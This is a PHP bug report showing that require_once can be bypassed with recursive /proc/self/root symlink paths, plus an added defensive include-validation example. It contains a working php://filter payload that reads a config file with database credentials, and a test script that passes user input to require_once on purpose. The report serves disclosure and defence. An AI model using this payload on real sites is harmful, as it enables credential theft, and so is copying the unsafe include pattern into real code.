Bug #79980 require_once can include a file twice via symlink loops
Submitted: 2020-08-16 05:18 UTC Modified: -
Votes:1
Avg. Score:3.0 ± 0.0
Reproduced:0 of 1 (0.0%)
From: i at littlefisher dot me Assigned:
Status: Open Package: *Directory/Filesystem functions
PHP Version: 7.2.33 OS: Ubuntu18.04
Private report: No CVE-ID: None

 [2020-08-16 05:18 UTC] i at littlefisher dot me
Description:
------------
Normally, when we include a file via `require_once()` which has been included before, PHP will prevent this behavior.

But when we set the file path to a symbolic link, PHP will be fooled. The example in the test script below demonstrates it. Assume there is some secret in `config.php`.

We can pass our payload to the `content` query parameter, and then PHP will resolve the file path to '/proc/24273/root/proc/self/root/var/www/html/config.php'.

Eventually, the `require_once` is bypassed. We got the base64-encoded content of `config.php`.

Payload:

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/config.php

Test script:
---------------
/* index.php */
<?php
error_reporting(E_ALL);
require_once('config.php');
highlight_file(__FILE__);
if(isset($_GET['content'])) {
    $content = $_GET['content'];
    require_once($content);
} 
/* config.php */
<?php
$MYSQL_HOST = '127.0.0.1';
$MYSQL_PORT = 3306;
$MYSQL_USERNAME = 'admin';
$MYSQL_PASSWORD = 'admin';

Expected result:
----------------
Expected result is that `config.php` cannot be included twice by the recursive symbolic link.
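
A defensive pattern for the `require_once($content)` line in the test script, as an added example that is not part of the original report or of PHP itself: the request value only selects a key from an allowlist, and an already-included file is detected by comparing canonical paths. `safe_include_target()`, the allowlist and the temporary files are assumptions made for illustration.

```php
<?php
// Added example, not from the bug report. safe_include_target() and the
// temporary files below are hypothetical names constructed for illustration.

// Map a request value to a file that may be included, or null to refuse.
function safe_include_target(string $requested, string $baseDir, array $allowed): ?string
{
    // Refuse stream wrappers (php://filter, data://, ...) and NUL bytes outright.
    if (strpos($requested, '://') !== false || strpos($requested, "\0") !== false) {
        return null;
    }
    // The request value is only ever a key into $allowed, never a path.
    if (!isset($allowed[$requested])) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $allowed[$requested]);
    // Fail closed when resolution fails (missing file, unresolvable symlink chain).
    if ($base === false || $real === false) {
        return null;
    }
    // The canonical path must stay inside the base directory.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Compare canonical paths ourselves instead of relying on require_once's bookkeeping.
    $included = array_filter(array_map('realpath', get_included_files()));
    return in_array($real, $included, true) ? null : $real;
}

// Constructed sample tree: one includable page and a symlink alias to it.
$dir = sys_get_temp_dir() . '/inc_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/about.php", "<?php return 'about';");
symlink("$dir/about.php", "$dir/alias.php");
$allowed = ['about' => 'about.php', 'alias' => 'alias.php'];

// Shortened form of the payload shown in the report.
$payload = 'php://filter/convert.base64-encode/resource=/proc/self/root/var/www/html/config.php';
var_dump(safe_include_target($payload, $dir, $allowed));     // stream wrapper input
var_dump(safe_include_target('../config', $dir, $allowed));  // key not in the allowlist
require_once safe_include_target('about', $dir, $allowed);   // allowed page, first include
var_dump(safe_include_target('alias', $dir, $allowed));      // symlink to the file just included

unlink("$dir/alias.php");
unlink("$dir/about.php");
rmdir($dir);
```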


Last updated: Mon Oct 26 02:01:23 2020 UTC